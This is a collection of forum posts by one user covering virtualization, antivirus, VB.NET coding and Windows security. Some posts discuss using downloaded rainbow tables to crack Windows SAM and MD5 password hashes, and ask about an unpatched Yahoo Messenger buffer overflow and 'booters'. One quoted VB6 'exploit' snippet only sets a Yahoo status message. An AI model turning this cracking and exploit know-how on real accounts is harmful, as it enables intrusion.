tansqrx

Like I said earlier I use both VMware and Virtual PC and in general I believe they are both about the same. When you are splitting hairs VMware wins though. A good analysis of this can be see at http://www.lycos.es/ As it turns out, Microsoft actually bought this technology from Connectix which means there is still some settling to be done. VMware has been the long time industry leader. I believe good things are to come from Virtual PC though. If Microsoft puts a little effort into this project, since they know the host OS the best and all the various obscure API calls, it will be on par with VMware.

I too think you will be alright, I have never heard of any one being exploited in the small amout of time it takes Windows to load the AV and firewall software. If you are really paranoid then perhaps you should look at all the start up programs with "msconfig" That way you will know if anything will try to access the internet while starting up. A second defence could be a hardware firewall between your DSL modem and your system. I use a Linksys broadband router/firewall and have had good results.

Not to be the angel of doom, but it looks like your going to be reformatting. I have run into similar problems, mostly trying to set the page file to zero.On a not too similar note, the reason I had problems was because the pagefile somehow got courpted and on the next reboot Norton went crazy and would not load up.

Does anyone know if Longhorn will support 64-bit?

I will have to agree with the above two, VM ware is most likely the best way to go but if you don't want to fool with the registration you can also use Microsoft's Virtual PC https://support.microsoft.com/en-us/products/windows I have run Microsoft's alternative for some time and it works suprisingly well. I also run VM ware at work and think it has a slight edge over the compentition but for home use I use Virtual PC. I run both WinXP and Fedora Core 3 on an AMD 1.1 GHz and ~900MB of RAM with acceptable results.

Thanks a million, I'll try it out once I get a chance. Looks like I will have to recruit some VB.NET coder to get in here. This and the exploits section are the only two that I would dare to say I even have a little experience in.Untill then I guess I will just have to post the problems that I am having.

Stupid? No way, there are still plenty of applications out there that use a MD5 hash and a plain MD5 hash at that. I agree, hashing twice or adding a seed value will throw off the rainbow tables, but as I said there are still plenty of apps that this would be useful against.

This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snipet. I know that most expolits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problems is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sence to them. Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As LongPublic Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPublic Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As LongPublic Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As LongPublic Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPublic Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As LongPublic Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As LongPrivate Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPrivate Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As LongPublic Declare Function ReleaseCapture Lib "user32" () As LongPublic Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As LongPrivate Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongPrivate Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongPrivate Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As LongPrivate Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As LongPrivate Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongPrivate Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As LongPrivate Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As LongPrivate Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As LongPrivate Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As LongPrivate Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As LongPrivate Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As LongPublic Const BM_SETCHECK = &HF1Public Const BM_GETCHECK = &HF0Public Const CB_GETCOUNT = &H146Public Const CB_GETLBTEXT = &H148Public Const CB_SETCURSEL = &H14EPublic Const GW_HWNDFIRST = 0Public Const GW_HWNDNEXT = 2Public Const GW_CHILD = 5Public Const LB_GETCOUNT = &H18BPublic Const LB_GETTEXT = &H189Public Const LB_SETCURSEL = &H186Public Const SW_HIDE = 0Public Const SW_MAXIMIZE = 3Public Const SW_MINIMIZE = 6Public Const SW_NORMAL = 1Public Const SW_SHOW = 5Public Const VK_SPACE = &H20Public Const WM_CHAR = &H102Public Const WM_CLOSE = &H10Public Const WM_COMMAND = &H111Public Const WM_GETTEXT = &HDPublic Const WM_GETTEXTLENGTH = &HEPublic Const WM_KEYDOWN = &H100Public Const WM_KEYUP = &H101Public Const WM_LBUTTONDBLCLK = &H203Public Const WM_LBUTTONDOWN = &H201Public Const WM_LBUTTONUP = &H202Public Const WM_MOVE = &HF012Public Const WM_RBUTTONDOWN = &H204Public Const WM_RBUTTONUP = &H205Public Const WM_SETTEXT = &HCPublic Const WM_SYSCOMMAND = &H112Const ERROR_SUCCESS = 0&Const REG_SZ = 1Const REG_DWORD = 4Public Enum HKeyTypesHKEY_CLASSES_ROOT = &H80000000HKEY_CURRENT_USER = &H80000001HKEY_LOCAL_MACHINE = &H80000002HKEY_USERS = &H80000003HKEY_PERFORMANCE_DATA = &H80000004End EnumSub YStatus(Status As String)Dim Name As StringName = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", 1, Status)Dim X As LongOn Error Resume NextX = FindWindow("YahooBuddyMain", vbNullString)SendMessageLong X, &H111, 388, 1&End SubSub YCap(cap As String)Dim yahoobuddymain As Longyahoobuddymain = FindWindow("yahoobuddymain", vbNullString)Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)End SubPublic Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)Dim keyhand As LongDim datatype As LongDim lResult As LongDim strBuf As StringDim lDataBufSize As LongDim intZeroPos As IntegerDim lValueType As Longr = RegOpenKey(hKey, strPath, keyhand)lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)If lValueType = REG_SZ ThenstrBuf = String(lDataBufSize, " ")lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)If lResult = ERROR_SUCCESS ThenintZeroPos = InStr(strBuf, Chr$(0))If intZeroPos > 0 ThenGetString = Left$(strBuf, intZeroPos - 1)ElseGetString = strBufEnd IfEnd IfEnd IfEnd FunctionPublic Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)Dim keyhand As LongDim r As Longr = RegCreateKey(hKey, strPath, keyhand)r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))r = RegCloseKey(keyhand)End Sub

Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus. Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability http://www.securityfocus.com/bid/12750 Does anyone have additional info on this exploit? Is it still valid?

Google? I'm talking about Yahoo Messenger not the search engine.

Thanks, I've tried to google it but all I get is ASP related XML. BTW this isn't a very active thread it it?

I have recently been playing around with rainbow tables. If you don't know what they are then look at http://forums.xisto.com/no_longer_exists/ They are basically a precomplied hash table of all possible values from a particular algorithm. The most common are for the Windows Lanman hashes which can crack any possible Windows SAM in little to no time. My question is are there similar tables circulating for MD5? I got the Windows tables from bit torrent which were around 12 Gb compressed and 64 uncompressed.

Can you go into more detail on why you had to fix Norton. I have been running both SystemWorks and Internet Security for years and have not had any problems. As I see it, as long as you keep your programs up to date you should be fine. The one grip I do have about Norton is in the Internet Security. A user should have better control over the firewall rules. Such as manually editing an ACL list.

Does anyone know an easy way to create an XML configuration file with Visual Basic.NET? I have a program that I have been working on and I would like to save certain data between sessions. I have heard from many people that XML is the way to go. Are there any good FAQ's

I like programming VB.NETThat said ANSI C is the language of God....mostly because only God can program in it.Everyone should know C!

Does HTML count? j/kI guess I have seriously been coding for only about 3 years when I was forced to by graduating and getting a job.Before that, I played around for 6 years while getting my EE degree.And finially add another 3 for just screwing around and making "Hello World!" programs.3+6+3....ahhh maybe 12 years

I highly recommend it, but of course my company bought it for me.There are some big changes from the older C++ and especially VB. The biggest is the move to managed code. I have done quite a bit of C++ programming but I haven't made the jump to c# yet. What I have done is VB. VB.NET is a completely new language, and that's a good thing. I have found that you can do 98.5% of what you can do in C or C# in VB.NET. The down side is that VB 6 is not compatible with .NET. You might have to rewrite some of your code. Again I say that this is not necessarly bad because I believe VB.NET is MUCH better than 6.

Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?

Yes you can capture any movies that you like. And yes it does make you take a hit on performance. The performance part is usually depending on what codec you are recording too (ie DivX, MPG) and the frame rate. I have found that if you capture at a lower rate (around 1-5 fps) then almost any system will handle it. The real beatuy of Camtasia is the live output functionality. You can enable options that will let you output you screen to a webcam or any other capture device. This makes a great tool for video conferencing. IMHO for stright screen capture I use Hypercam http://www.hyperionics.com/ It is smaller and I don't see as big of a performance hit.

In short, you have to call several windows APIs. [COLOR=green]' Constants[/COLOR]Const SE_PRIVILEGE_ENABLED As Integer = &H2Const TOKEN_QUERY As Integer = &H8Const TOKEN_ADJUST_PRIVILEGES As Integer = &H20Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege" [COLOR=green]' Exit Windows Constants[/COLOR]Const EWX_LOGOFF As Integer = &H0Const EWX_SHUTDOWN As Integer = &H1Const EWX_REBOOT As Integer = &H2Const EWX_FORCE As Integer = &H4Const EWX_POWEROFF As Integer = &H8Const EWX_FORCEIFHUNG As Integer = &H10 [COLOR=green]'Structure<StructLayout(LayoutKind.Sequential, Pack:=1)> _Friend Structure Luid Public Count As Integer Public Luid As Long Public Attr As IntegerEnd Structure 'TokPriv1Luid [COLOR=green]' Get Current Processes.<DllImport("kernel32.dll", ExactSpelling:=True)> _Function GetCurrentProcess() As IntPtrEnd Function [CODE][COLOR=green]' Open Process Token.<DllImport("advapi32.dll", SetLastError:=True)> _Function OpenProcessToken(ByVal h As IntPtr, ByVal acc As Integer, ByRef phtok As IntPtr) As BooleanEnd Function [COLOR=green]' Look up Priviledge Value. <DllImport("advapi32.dll", SetLastError:=True)> _Friend Function LookupPrivilegeValue(ByVal host As String, ByVal name As String, ByRef pluid As Long) As BooleanEnd Function [COLOR=green]' Adjust Token Priviledges.[/COLOR]<DllImport("advapi32.dll", ExactSpelling:=True, SetLastError:=True)> _Friend Function AdjustTokenPrivileges(ByVal htok As IntPtr, ByVal disall As Boolean, ByRef newst As Luid, ByVal len As Integer, ByVal prev As IntPtr, ByVal relen As IntPtr) As BooleanEnd Function [COLOR=green]' Exit Windows[/COLOR]<DllImport("user32.dll", ExactSpelling:=True, SetLastError:=True)> _Friend Function ExitWindowsEx(ByVal flg As Integer, ByVal rea As Integer) As BooleanEnd Function [COLOR=green]' Exit Windows Sub[/COLOR]Private Sub DoExitWindows(ByVal flg As Integer) Dim tp As Luid Dim hproc As IntPtr = GetCurrentProcess() Dim htok As IntPtr = IntPtr.Zero [COLOR=green] 'Get a token for this process. [/COLOR] OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, htok) tp.Count = 1 tp.Luid = 0 tp.Attr = SE_PRIVILEGE_ENABLED [COLOR=green] 'Get the LUID for the shutdown privilege.[/COLOR] LookupPrivilegeValue(Nothing, SE_SHUTDOWN_NAME, tp.Luid) [COLOR=green] 'Get the shutdown privilege for this process.[/COLOR] AdjustTokenPrivileges(htok, False, tp, 0, IntPtr.Zero, IntPtr.Zero) [COLOR=green] 'Exit Windows[/COLOR] ExitWindowsEx(flg, 0)End Sub [COLOR=green]' Shutdown[/COLOR]DoExitWindows(EWX_SHUTDOWN)[COLOR=green]' Restart[/COLOR]DoExitWindows(EWX_REBOOT Or EWX_FORCE)[COLOR=green]' Log off[/COLOR]DoExitWindows(EWX_LOGOFF)[/code] A site that really describes this process is https://blogs.msdn.microsoft.com/

Didn't really see if you were talking VB 6 or .NET. In .NET you can use the "Nothing" keyword.Dim array() As Integer If array Is Nothing Then 'do something End If